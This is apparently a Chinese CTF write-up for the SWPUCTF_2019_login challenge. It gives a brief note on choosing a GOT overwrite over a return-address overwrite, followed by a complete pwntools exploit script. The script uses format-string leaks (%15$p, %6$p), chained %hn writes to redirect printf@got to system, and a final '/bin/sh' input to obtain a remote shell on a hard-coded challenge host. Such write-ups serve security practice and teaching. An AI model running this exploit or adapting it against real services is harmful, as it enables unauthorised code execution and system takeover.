本来想改返回地址的,但是发现不论是`one_gadget`还是`system`都出现了`dump core`,据说是32位程序这样改返回地址很容易爆,我也不知道为什么。最后还是覆写的`printf@got`。 没有新知识,就是非栈上的格式化字符串。

### exp

```python
#!/usr/bin/env python
# coding=utf-8
# Solve script for the SWPUCTF_2019_login challenge (32-bit target, libc 2.27 per the paths below).
# Flow: leak a libc address with "%15$p" -> derive libc base and system ->
# leak a stack address with "%6$p" -> use paired %hn writes to plant printf@got
# in two stack slots -> write the two halves of system into printf@got ->
# send "/bin/sh" so the next printf call executes it.
# The weakness being exercised is an attacker-controlled printf format string;
# the GOT overwrite additionally depends on the GOT being writable (i.e. not Full RELRO).
# Python 2 script: `print payload` is a statement and pwntools receives str payloads.
from pwn import *
#context(log_level = 'debug')
#sh = process("./SWPUCTF_2019_login")
# Remote host/port are hard-coded; the commented-out process() line is the local variant.
sh = remote("node3.buuoj.cn",28692)
libc = ELF("./libcs/libc-2.27.so")
sh.sendlineafter("name: \n",'pwn')
# Stage 1: leak. Stack slot 15 is printed as a pointer; the value is echoed back after "password: ".
payload = "%15$p"
sh.sendlineafter("password: \n",payload)
sh.recvuntil("password: ")
libc_base = int(sh.recvuntil("\n",drop = True),base = 16)
# NOTE(review): assumes the leaked value is the return address into __libc_start_main
# at offset 241 for this libc build; a different libc/offset breaks every later address.
libc_base = libc_base - (libc.symbols["__libc_start_main"] + 241)
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.symbols["system"]
log.success("system_addr:" + hex(system_addr))
# Target of the final write: printf's GOT entry (static address, so the binary is presumably non-PIE).
printf_got = ELF("./SWPUCTF_2019_login").got["printf"]
log.success("printf@got:" + hex(printf_got))
# Stage 2: leak a stack pointer from slot 6; -0x10 rebases it to the slots used below (TODO confirm offset).
payload = "%6$p"
sh.sendlineafter("again!\n",payload)
sh.recvuntil("password: ")
stack_addr = int(sh.recvuntil("\n",drop = True),base = 16) - 0x10
log.success("stack_addr:" + hex(stack_addr))
# Stage 3: two-level pointer writes. Each "%6$hn" rewrites the low half of the
# pointer slot 6 refers to (so that it points at stack_addr+4/+6/+8/+10), and the
# following "%10$hn" stores a half of printf_got (or printf_got+2) through that
# pointer. After four pairs, the cells at stack_addr+4 and stack_addr+8 hold
# printf_got and printf_got+2 respectively. The %c width is masked to 16 bits
# because %hn writes the cumulative output length as a 2-byte value.
payload = "%" + str((stack_addr + 4) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(printf_got & 0xffff) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((stack_addr + 6) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str(printf_got >> 16) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((stack_addr + 8) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((printf_got + 2) & 0xffff) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((stack_addr + 10) & 0xffff) + 'c' + "%6$hn"
sh.sendlineafter("again!\n",payload)
payload = "%" + str((printf_got + 2) >> 16) + 'c' + "%10$hn"
sh.sendlineafter("again!\n",payload)
# Stage 4: slots 7 and 8 now point at printf_got and printf_got+2; write the low
# and high halves of system in one format string. The second width is the
# difference because %n-style counts are cumulative.
# NOTE(review): this assumes (system_addr >> 16) > (system_addr & 0xffff); when the
# high half is smaller the width goes negative and the second write misfires.
payload = "%" + str(system_addr & 0xffff) + 'c' + "%7$hn"
payload += "%" + str((system_addr >> 16) - (system_addr & 0xffff)) + 'c' + "%8$hn"
print payload
sh.sendlineafter("again!\n",payload)
# printf now resolves to system, so the next input string is executed as a command.
sh.sendlineafter("again!\n","/bin/sh")
sh.interactive()
```

最后修改:2021 年 01 月 27 日